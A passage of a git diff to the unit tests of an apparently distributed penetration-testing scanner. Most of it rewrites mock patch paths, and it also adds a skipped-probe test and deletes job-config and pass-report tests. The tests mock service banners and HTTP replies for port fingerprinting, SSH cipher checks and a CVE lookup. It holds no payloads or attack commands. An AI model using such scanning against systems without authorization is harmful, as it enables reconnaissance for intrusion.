@@ -1151,7 +1160,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_mysql("example.com", 3306) @@ -1169,7 +1178,7 @@ def test_tech_fingerprint(self): resp.text = '' resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", return_value=resp, ): result = worker._web_test_tech_fingerprint("example.com", 80) @@ -1208,7 
+1217,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = modbus_response return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._active_fingerprint_ports() self.assertEqual(worker.state["port_protocols"][1024], "modbus") @@ -1227,7 +1236,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = b"" return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._active_fingerprint_ports() self.assertEqual(worker.state["port_protocols"][1024], "unknown") @@ -1247,7 +1256,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = fake_binary return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._scan_ports_step() self.assertNotEqual(worker.state["port_protocols"][37364], "mysql") @@ -1269,7 +1278,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = mysql_greeting return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._scan_ports_step() self.assertEqual(worker.state["port_protocols"][3306], "mysql") @@ -1288,7 +1297,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = telnet_banner return mock_sock - with 
patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._scan_ports_step() self.assertEqual(worker.state["port_protocols"][2323], "telnet") @@ -1307,7 +1316,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = fake_binary return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._scan_ports_step() self.assertNotEqual(worker.state["port_protocols"][8502], "telnet") @@ -1325,7 +1334,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = login_banner return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._scan_ports_step() self.assertEqual(worker.state["port_protocols"][2323], "telnet") @@ -1353,7 +1362,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = bad_modbus return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._active_fingerprint_ports() self.assertNotEqual(worker.state["port_protocols"][1024], "modbus") @@ -1373,7 +1382,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = fake_pkt return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with 
patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._scan_ports_step() self.assertNotEqual(worker.state["port_protocols"][9999], "mysql") @@ -1392,7 +1401,7 @@ def recv(self, n): return b"220 mail.example.com ESMTP Exim 4.94.1 ready\r\n" def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.tls.socket.socket", return_value=DummySocket(), ): result = worker._service_info_generic("example.com", 9999) @@ -1414,7 +1423,7 @@ def recv(self, n): return b"SSH-2.0-OpenSSH_7.4\r\n" def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.tls.socket.socket", return_value=DummySocket(), ): result = worker._service_info_generic("example.com", 9999) @@ -1436,7 +1445,7 @@ def recv(self, n): return b'\x00\x01\x00\x00\x00\x05\x01\x03' def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.tls.socket.socket", return_value=DummySocket(), ): result = worker._service_info_generic("example.com", 9999) @@ -1455,7 +1464,7 @@ def recv(self, n): return b"Welcome to Custom Service\r\n" def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.tls.socket.socket", return_value=DummySocket(), ): result = worker._service_info_generic("example.com", 9999) @@ -1482,13 +1491,14 @@ def fake_get(url, timeout=3, verify=False, allow_redirects=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_vpn_endpoints("example.com", 443) 
self._assert_has_finding(result, "FortiGate") + class TestFindingsModule(unittest.TestCase): """Standalone tests for findings.py module.""" @@ -1512,6 +1522,7 @@ def test_finding_hashable(self): self.assertEqual(len(s), 1) + class TestCveDatabase(unittest.TestCase): """Standalone tests for cve_db.py module.""" @@ -1538,6 +1549,7 @@ def test_apache_path_traversal(self): self.assertTrue(any("CVE-2021-41773" in t for t in cve_ids)) + class TestCorrelationEngine(unittest.TestCase): """Tests for the cross-service correlation engine.""" @@ -1692,7 +1704,7 @@ def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_mysql("example.com", 3306) @@ -1734,7 +1746,7 @@ def quit(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.ftplib.FTP", + "extensions.business.cybersec.red_mesh.worker.service.common.ftplib.FTP", return_value=DummyFTP(), ): info = worker._service_info_ftp("example.com", 21) @@ -1755,7 +1767,7 @@ def fake_get(url, timeout=2, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_common("example.com", 80) @@ -1837,7 +1849,7 @@ def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.paramiko.Transport", + "extensions.business.cybersec.red_mesh.worker.service.common.paramiko.Transport", return_value=DummyTransport(), ): findings, weak_labels = worker._ssh_check_ciphers("example.com", 22) @@ -1858,6 +1870,23 @@ def test_execute_job_correlation(self): self.assertTrue(worker.state["done"]) self.assertIn("correlation_completed", worker.state["completed_tests"]) + def test_execute_job_skips_disabled_correlation_probe(self): + """Disabled 
correlation is reflected as a skipped probe, not silently omitted.""" + _, worker = self._build_worker() + worker._PentestLocalWorker__enabled_features = [] + + with patch.object(worker, "_scan_ports_step"), \ + patch.object(worker, "_active_fingerprint_ports"), \ + patch.object(worker, "_gather_service_info"), \ + patch.object(worker, "_run_web_tests"), \ + patch.object(worker, "_post_scan_correlate") as mock_correlate: + worker.execute_job() + + mock_correlate.assert_not_called() + metrics = worker.metrics.build().to_dict() + self.assertEqual(metrics["probe_breakdown"]["_post_scan_correlate"], "skipped:disabled") + + class TestScannerEnhancements(unittest.TestCase): """Tests for the 5 partial scanner enhancements (Tier 1).""" @@ -1976,7 +2005,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_redis("example.com", 6379) @@ -2015,7 +2044,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_redis("example.com", 6379) @@ -2048,7 +2077,7 @@ def get_remote_server_key(self): return DummyKey() def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.paramiko.Transport", + "extensions.business.cybersec.red_mesh.worker.service.common.paramiko.Transport", return_value=DummyTransport(), ): findings, weak_labels = worker._ssh_check_ciphers("example.com", 22) @@ -2080,7 +2109,7 @@ def get_remote_server_key(self): return DummyKey() def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.paramiko.Transport", + "extensions.business.cybersec.red_mesh.worker.service.common.paramiko.Transport", 
return_value=DummyTransport(), ): findings, weak_labels = worker._ssh_check_ciphers("example.com", 22) @@ -2112,7 +2141,7 @@ def get_remote_server_key(self): return DummyKey() def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.paramiko.Transport", + "extensions.business.cybersec.red_mesh.worker.service.common.paramiko.Transport", return_value=DummyTransport(), ): findings, weak_labels = worker._ssh_check_ciphers("example.com", 22) @@ -2188,7 +2217,7 @@ def fake_get(url, timeout=2, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_common("example.com", 80) @@ -2210,7 +2239,7 @@ def fake_get(url, timeout=2, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_common("example.com", 80) @@ -2232,7 +2261,7 @@ def fake_get(url, timeout=2, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_common("example.com", 80) @@ -2261,10 +2290,10 @@ def close(self): pass # Case 1: requests fails, raw socket also gets empty reply with patch( - "extensions.business.cybersec.red_mesh.service_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.service.common.requests.get", side_effect=ReqConnError("RemoteDisconnected"), ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.common.socket.socket", return_value=DummySocket([b""]), ): result = worker._service_info_http("10.0.0.1", 81) @@ 
-2292,10 +2321,10 @@ def close(self): pass raw_resp = b"HTTP/1.1 200 OK\r\nServer: nginx/1.24.0\r\n\r\n" with patch( - "extensions.business.cybersec.red_mesh.service_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.service.common.requests.get", side_effect=ReqConnError("RemoteDisconnected"), ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.common.socket.socket", return_value=DummySocket([raw_resp, b""]), ): result = worker._service_info_http("10.0.0.1", 81) @@ -2328,10 +2357,10 @@ def close(self): pass ) with patch( - "extensions.business.cybersec.red_mesh.service_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.service.common.requests.get", side_effect=ReqConnError("RemoteDisconnected"), ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.common.socket.socket", return_value=DummySocket([raw_resp, b""]), ): result = worker._service_info_http("10.0.0.1", 81) @@ -2342,2335 +2371,6 @@ def close(self): pass self.assertEqual(result.get("title"), "Directory listing for /") -class TestPhase1ConfigCID(unittest.TestCase): - """Phase 1: Job Config CID — extract static config from CStore to R1FS.""" - - def test_config_cid_roundtrip(self): - """JobConfig.from_dict(config.to_dict()) preserves all fields.""" - from extensions.business.cybersec.red_mesh.models import JobConfig - - original = JobConfig( - target="example.com", - start_port=1, - end_port=1024, - exceptions=[22, 80], - distribution_strategy="SLICE", - port_order="SHUFFLE", - nr_local_workers=4, - enabled_features=["http_headers", "sql_injection"], - excluded_features=["brute_force"], - run_mode="SINGLEPASS", - scan_min_delay=0.1, - scan_max_delay=0.5, - ics_safe_mode=True, - redact_credentials=False, - scanner_identity="test-scanner", - scanner_user_agent="RedMesh/1.0", - task_name="Test Scan", - 
task_description="A test scan", - monitor_interval=300, - selected_peers=["peer1", "peer2"], - created_by_name="tester", - created_by_id="user-123", - authorized=True, - ) - d = original.to_dict() - restored = JobConfig.from_dict(d) - self.assertEqual(original, restored) - - def test_config_to_dict_has_required_fields(self): - """to_dict() includes target, start_port, end_port, run_mode.""" - from extensions.business.cybersec.red_mesh.models import JobConfig - - config = JobConfig( - target="10.0.0.1", - start_port=1, - end_port=65535, - exceptions=[], - distribution_strategy="SLICE", - port_order="SEQUENTIAL", - nr_local_workers=2, - enabled_features=[], - excluded_features=[], - run_mode="CONTINUOUS_MONITORING", - ) - d = config.to_dict() - self.assertEqual(d["target"], "10.0.0.1") - self.assertEqual(d["start_port"], 1) - self.assertEqual(d["end_port"], 65535) - self.assertEqual(d["run_mode"], "CONTINUOUS_MONITORING") - - def test_config_strip_none(self): - """_strip_none removes None values from serialized config.""" - from extensions.business.cybersec.red_mesh.models import JobConfig - - config = JobConfig( - target="example.com", - start_port=1, - end_port=100, - exceptions=[], - distribution_strategy="SLICE", - port_order="SEQUENTIAL", - nr_local_workers=2, - enabled_features=[], - excluded_features=[], - run_mode="SINGLEPASS", - selected_peers=None, - ) - d = config.to_dict() - self.assertNotIn("selected_peers", d) - - @classmethod - def _mock_plugin_modules(cls): - """Install mock modules so pentester_api_01 can be imported without naeural_core.""" - if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return # Already imported successfully - - # Build a real class to avoid metaclass conflicts - def endpoint_decorator(*args, **kwargs): - if args and callable(args[0]): - return args[0] - def wrapper(fn): - return fn - return wrapper - - class FakeBasePlugin: - CONFIG = {'VALIDATION_RULES': {}} - endpoint = 
staticmethod(endpoint_decorator) - - mock_module = MagicMock() - mock_module.FastApiWebAppPlugin = FakeBasePlugin - - modules_to_mock = { - 'naeural_core': MagicMock(), - 'naeural_core.business': MagicMock(), - 'naeural_core.business.default': MagicMock(), - 'naeural_core.business.default.web_app': MagicMock(), - 'naeural_core.business.default.web_app.fast_api_web_app': mock_module, - } - for mod_name, mod in modules_to_mock.items(): - sys.modules.setdefault(mod_name, mod) - - @classmethod - def _build_mock_plugin(cls, job_id="test-job", time_val=1000000.0, r1fs_cid="QmFakeConfigCID"): - """Build a mock plugin instance for launch_test testing.""" - plugin = MagicMock() - plugin.ee_addr = "node-1" - plugin.ee_id = "node-alias-1" - plugin.cfg_instance_id = "test-instance" - plugin.cfg_port_order = "SEQUENTIAL" - plugin.cfg_excluded_features = [] - plugin.cfg_distribution_strategy = "SLICE" - plugin.cfg_run_mode = "SINGLEPASS" - plugin.cfg_monitor_interval = 60 - plugin.cfg_scanner_identity = "" - plugin.cfg_scanner_user_agent = "" - plugin.cfg_nr_local_workers = 2 - plugin.cfg_llm_agent_api_enabled = False - plugin.cfg_ics_safe_mode = False - plugin.cfg_scan_min_rnd_delay = 0 - plugin.cfg_scan_max_rnd_delay = 0 - plugin.uuid.return_value = job_id - plugin.time.return_value = time_val - plugin.json_dumps.return_value = "{}" - plugin.r1fs = MagicMock() - plugin.r1fs.add_json.return_value = r1fs_cid - plugin.chainstore_hset = MagicMock() - plugin.chainstore_hgetall.return_value = {} - plugin.chainstore_peers = ["node-1"] - plugin.cfg_chainstore_peers = ["node-1"] - return plugin - - @classmethod - def _extract_job_specs(cls, plugin, job_id): - """Extract the job_specs dict from chainstore_hset calls.""" - for call in plugin.chainstore_hset.call_args_list: - kwargs = call[1] if call[1] else {} - if kwargs.get("key") == job_id: - return kwargs["value"] - return None - - def _launch(self, plugin, **kwargs): - """Call launch_test with mocked base modules.""" - 
self._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - defaults = dict(target="example.com", start_port=1, end_port=1024, exceptions="", authorized=True) - defaults.update(kwargs) - return PentesterApi01Plugin.launch_test(plugin, **defaults) - - def test_launch_builds_job_config_and_stores_cid(self): - """launch_test() builds JobConfig, saves to R1FS, stores job_config_cid in CStore.""" - plugin = self._build_mock_plugin(job_id="test-job-1", r1fs_cid="QmFakeConfigCID123") - self._launch(plugin) - - # Verify r1fs.add_json was called with a JobConfig dict - self.assertTrue(plugin.r1fs.add_json.called) - config_dict = plugin.r1fs.add_json.call_args_list[0][0][0] - self.assertEqual(config_dict["target"], "example.com") - self.assertEqual(config_dict["start_port"], 1) - self.assertEqual(config_dict["end_port"], 1024) - self.assertIn("run_mode", config_dict) - - # Verify CStore has job_config_cid - job_specs = self._extract_job_specs(plugin, "test-job-1") - self.assertIsNotNone(job_specs, "Expected chainstore_hset call for job_specs") - self.assertEqual(job_specs["job_config_cid"], "QmFakeConfigCID123") - - def test_cstore_has_no_static_config(self): - """After launch, CStore object has no exceptions, distribution_strategy, etc.""" - plugin = self._build_mock_plugin(job_id="test-job-2") - self._launch(plugin) - - job_specs = self._extract_job_specs(plugin, "test-job-2") - self.assertIsNotNone(job_specs) - - # These static config fields must NOT be in CStore - removed_fields = [ - "exceptions", "distribution_strategy", "enabled_features", - "excluded_features", "scan_min_delay", "scan_max_delay", - "ics_safe_mode", "redact_credentials", "scanner_identity", - "scanner_user_agent", "nr_local_workers", "task_description", - "monitor_interval", "selected_peers", "created_by_name", - "created_by_id", "authorized", "port_order", - ] - for field in removed_fields: - self.assertNotIn(field, job_specs, f"CStore 
should not contain '{field}'") - - def test_cstore_has_listing_fields(self): - """CStore has target, task_name, start_port, end_port, date_created.""" - plugin = self._build_mock_plugin(job_id="test-job-3", time_val=1700000000.0) - self._launch(plugin, start_port=80, end_port=443, task_name="Web Scan") - - job_specs = self._extract_job_specs(plugin, "test-job-3") - self.assertIsNotNone(job_specs) - - self.assertEqual(job_specs["target"], "example.com") - self.assertEqual(job_specs["task_name"], "Web Scan") - self.assertEqual(job_specs["start_port"], 80) - self.assertEqual(job_specs["end_port"], 443) - self.assertEqual(job_specs["date_created"], 1700000000.0) - self.assertEqual(job_specs["risk_score"], 0) - - def test_pass_reports_initialized_empty(self): - """CStore has pass_reports: [] (no pass_history).""" - plugin = self._build_mock_plugin(job_id="test-job-4") - self._launch(plugin, start_port=1, end_port=100) - - job_specs = self._extract_job_specs(plugin, "test-job-4") - self.assertIsNotNone(job_specs) - - self.assertIn("pass_reports", job_specs) - self.assertEqual(job_specs["pass_reports"], []) - self.assertNotIn("pass_history", job_specs) - - def test_launch_fails_if_r1fs_unavailable(self): - """If R1FS fails to store config, launch aborts with error.""" - plugin = self._build_mock_plugin(job_id="test-job-5", r1fs_cid=None) - result = self._launch(plugin, start_port=1, end_port=100) - - self.assertIn("error", result) - # CStore should NOT have been written with the job - job_specs = self._extract_job_specs(plugin, "test-job-5") - self.assertIsNone(job_specs) - - -class TestPhase2PassFinalization(unittest.TestCase): - """Phase 2: Single Aggregation + Consolidated Pass Reports.""" - - @classmethod - def _mock_plugin_modules(cls): - """Install mock modules so pentester_api_01 can be imported without naeural_core.""" - if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return - TestPhase1ConfigCID._mock_plugin_modules() - - def 
_get_plugin_class(self): - self._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - return PentesterApi01Plugin - - def _build_finalize_plugin(self, job_id="test-job", job_pass=1, run_mode="SINGLEPASS", - llm_enabled=False, r1fs_returns=None): - """Build a mock plugin pre-configured for _maybe_finalize_pass testing.""" - plugin = MagicMock() - plugin.ee_addr = "launcher-node" - plugin.ee_id = "launcher-alias" - plugin.cfg_instance_id = "test-instance" - plugin.cfg_llm_agent_api_enabled = llm_enabled - plugin.cfg_llm_agent_api_host = "localhost" - plugin.cfg_llm_agent_api_port = 8080 - plugin.cfg_llm_agent_api_timeout = 30 - plugin.cfg_llm_auto_analysis_type = "security_assessment" - plugin.cfg_monitor_interval = 60 - plugin.cfg_monitor_jitter = 0 - plugin.cfg_attestation_min_seconds_between_submits = 300 - plugin.time.return_value = 1000100.0 - plugin.json_dumps.return_value = "{}" - - # R1FS mock - plugin.r1fs = MagicMock() - cid_counter = {"n": 0} - def fake_add_json(data, show_logs=True): - cid_counter["n"] += 1 - if r1fs_returns is not None: - return r1fs_returns.get(cid_counter["n"], f"QmCID{cid_counter['n']}") - return f"QmCID{cid_counter['n']}" - plugin.r1fs.add_json.side_effect = fake_add_json - - # Job config in R1FS - plugin.r1fs.get_json.return_value = { - "target": "example.com", "start_port": 1, "end_port": 1024, - "run_mode": run_mode, "enabled_features": [], "monitor_interval": 60, - } - - # Build job_specs with two finished workers - job_specs = { - "job_id": job_id, - "job_status": "RUNNING", - "job_pass": job_pass, - "run_mode": run_mode, - "launcher": "launcher-node", - "launcher_alias": "launcher-alias", - "target": "example.com", - "task_name": "Test", - "start_port": 1, - "end_port": 1024, - "date_created": 1000000.0, - "risk_score": 0, - "job_config_cid": "QmConfigCID", - "workers": { - "worker-A": {"start_port": 1, "end_port": 512, "finished": True, "report_cid": "QmReportA"}, - 
"worker-B": {"start_port": 513, "end_port": 1024, "finished": True, "report_cid": "QmReportB"}, - }, - "timeline": [{"type": "created", "label": "Created", "date": 1000000.0, "actor": "launcher-alias", "actor_type": "system", "meta": {}}], - "pass_reports": [], - } - - plugin.chainstore_hgetall.return_value = {job_id: job_specs} - plugin.chainstore_hset = MagicMock() - - return plugin, job_specs - - def _sample_node_report(self, start_port=1, end_port=512, open_ports=None, findings=None): - """Build a sample node report dict.""" - report = { - "start_port": start_port, - "end_port": end_port, - "open_ports": open_ports or [80, 443], - "ports_scanned": end_port - start_port + 1, - "nr_open_ports": len(open_ports or [80, 443]), - "service_info": {}, - "web_tests_info": {}, - "completed_tests": ["port_scan"], - "port_protocols": {"80": "http", "443": "https"}, - "port_banners": {}, - "correlation_findings": [], - } - if findings: - # Add findings under service_info for port 80 - report["service_info"] = { - "80": { - "_service_info_http": { - "findings": findings, - } - } - } - return report - - def test_single_aggregation(self): - """_collect_node_reports called exactly once per pass finalization.""" - PentesterApi01Plugin = self._get_plugin_class() - plugin, job_specs = self._build_finalize_plugin() - - # Mock _collect_node_reports and _get_aggregated_report - report_a = self._sample_node_report(1, 512, [80]) - report_b = self._sample_node_report(513, 1024, [443]) - plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a, "worker-B": report_b}) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80, 443], "service_info": {}, "web_tests_info": {}, - "completed_tests": ["port_scan"], "ports_scanned": 1024, - "nr_open_ports": 2, "port_protocols": {"80": "http", "443": "https"}, - }) - plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) - plugin._get_job_config = 
MagicMock(return_value={"target": "example.com", "monitor_interval": 60}) - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 25, "breakdown": {}}, [])) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._get_timeline_date = MagicMock(return_value=1000000.0) - plugin._emit_timeline_event = MagicMock() - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # _collect_node_reports called exactly once - plugin._collect_node_reports.assert_called_once() - - def test_pass_report_cid_in_r1fs(self): - """PassReport stored in R1FS with correct fields.""" - PentesterApi01Plugin = self._get_plugin_class() - plugin, job_specs = self._build_finalize_plugin() - - report_a = self._sample_node_report(1, 512, [80]) - plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80], "service_info": {}, "web_tests_info": {}, - "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, - "port_protocols": {"80": "http"}, - }) - plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) - plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 10, "breakdown": {"findings_score": 5}}, [])) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._get_timeline_date = MagicMock(return_value=1000000.0) - plugin._emit_timeline_event = MagicMock() - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # r1fs.add_json called twice: once for aggregated data, once for PassReport - self.assertEqual(plugin.r1fs.add_json.call_count, 2) - - # Second call is the PassReport - pass_report_dict = plugin.r1fs.add_json.call_args_list[1][0][0] - self.assertEqual(pass_report_dict["pass_nr"], 1) - self.assertIn("aggregated_report_cid", pass_report_dict) - self.assertIn("worker_reports", pass_report_dict) - 
self.assertEqual(pass_report_dict["risk_score"], 10) - self.assertIn("risk_breakdown", pass_report_dict) - self.assertIn("date_started", pass_report_dict) - self.assertIn("date_completed", pass_report_dict) - - def test_aggregated_report_separate_cid(self): - """aggregated_report_cid is a separate R1FS write from the PassReport.""" - PentesterApi01Plugin = self._get_plugin_class() - plugin, job_specs = self._build_finalize_plugin(r1fs_returns={1: "QmAggCID", 2: "QmPassCID"}) - - report_a = self._sample_node_report(1, 512, [80]) - plugin._collect_node_reports = MagicMock(return_value={"worker-A": report_a}) - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80], "service_info": {}, "web_tests_info": {}, - "completed_tests": [], "ports_scanned": 512, "nr_open_ports": 1, - "port_protocols": {}, - }) - plugin._normalize_job_record = MagicMock(return_value=(job_specs["job_id"], job_specs)) - plugin._get_job_config = MagicMock(return_value={"target": "example.com"}) - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 0, "breakdown": {}}, [])) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._get_timeline_date = MagicMock(return_value=1000000.0) - plugin._emit_timeline_event = MagicMock() - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # First R1FS write = aggregated data, second = PassReport - agg_dict = plugin.r1fs.add_json.call_args_list[0][0][0] - pass_dict = plugin.r1fs.add_json.call_args_list[1][0][0] - - # The PassReport references the aggregated CID - self.assertEqual(pass_dict["aggregated_report_cid"], "QmAggCID") - - # Aggregated data should have open_ports (from AggregatedScanData) - self.assertIn("open_ports", agg_dict) - - def test_finding_id_deterministic(self): - """Same input produces same finding_id; different title produces different id.""" - PentesterApi01Plugin = self._get_plugin_class() - - aggregated = { - "open_ports": [80], "ports_scanned": 100, "nr_open_ports": 
1, - "port_protocols": {"80": "http"}, - "service_info": { - "80": { - "_service_info_http": { - "findings": [ - {"title": "SQL Injection", "severity": "HIGH", "cwe_id": "CWE-89", "confidence": "firm"}, - ] - } - } - }, - "web_tests_info": {}, - "correlation_findings": [], - } - - risk1, findings1 = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) - risk2, findings2 = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) - - self.assertEqual(findings1[0]["finding_id"], findings2[0]["finding_id"]) - - # Different title → different finding_id - aggregated2 = { - "open_ports": [80], "ports_scanned": 100, "nr_open_ports": 1, - "port_protocols": {"80": "http"}, - "service_info": { - "80": { - "_service_info_http": { - "findings": [ - {"title": "XSS Vulnerability", "severity": "HIGH", "cwe_id": "CWE-79", "confidence": "firm"}, - ] - } - } - }, - "web_tests_info": {}, - "correlation_findings": [], - } - _, findings3 = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated2) - self.assertNotEqual(findings1[0]["finding_id"], findings3[0]["finding_id"]) - - def test_finding_id_cwe_collision(self): - """Same CWE, different title, same port+probe → different finding_ids.""" - PentesterApi01Plugin = self._get_plugin_class() - - aggregated = { - "open_ports": [80], "ports_scanned": 100, "nr_open_ports": 1, - "port_protocols": {"80": "http"}, - "service_info": { - "80": { - "_web_test_xss": { - "findings": [ - {"title": "Reflected XSS in search", "severity": "HIGH", "cwe_id": "CWE-79", "confidence": "certain"}, - {"title": "Stored XSS in comment", "severity": "HIGH", "cwe_id": "CWE-79", "confidence": "certain"}, - ] - } - } - }, - "web_tests_info": {}, - "correlation_findings": [], - } - - _, findings = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) - self.assertEqual(len(findings), 2) - self.assertNotEqual(findings[0]["finding_id"], findings[1]["finding_id"]) - - def test_finding_enrichment_fields(self): - """Each finding 
has finding_id, port, protocol, probe, category.""" - PentesterApi01Plugin = self._get_plugin_class() - - aggregated = { - "open_ports": [443], "ports_scanned": 100, "nr_open_ports": 1, - "port_protocols": {"443": "https"}, - "service_info": { - "443": { - "_service_info_ssl": { - "findings": [ - {"title": "Weak TLS", "severity": "MEDIUM", "cwe_id": "CWE-326", "confidence": "certain"}, - ] - } - } - }, - "web_tests_info": {}, - "correlation_findings": [], - } - - _, findings = PentesterApi01Plugin._compute_risk_and_findings(None, aggregated) - self.assertEqual(len(findings), 1) - f = findings[0] - self.assertIn("finding_id", f) - self.assertEqual(len(f["finding_id"]), 16) # 16-char hex - self.assertEqual(f["port"], 443) - self.assertEqual(f["protocol"], "https") - self.assertEqual(f["probe"], "_service_info_ssl") - self.assertEqual(f["category"], "service") - - def test_port_protocols_none(self): - """port_protocols is None → protocol defaults to 'unknown' (no crash).""" - PentesterApi01Plugin = self._get_plugin_class() - - aggregated = { - "open_ports": [22], "ports_scanned": 100, "nr_open_ports": 1, - "port_protocols": None, - "service_info": { - "22": { - "_service_info_ssh": { - "findings": [ 